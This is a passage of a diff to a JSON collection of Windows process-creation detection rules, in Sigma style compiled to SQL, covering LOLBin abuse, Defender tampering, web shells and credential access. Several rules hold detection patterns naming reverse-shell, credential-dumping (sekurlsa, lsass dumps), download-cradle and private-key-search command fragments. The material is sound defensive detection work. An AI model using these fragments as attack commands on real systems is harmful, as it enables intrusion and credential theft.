"Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
(CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": 
"proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "status": "experimental", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - 
"title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", - "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": 
"bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), 
Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE 
'%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under 
HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential 
BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", + "status": "experimental", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + 
"description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], "falsepositives": [ - "Unlikely" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "author": "frack113", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' 
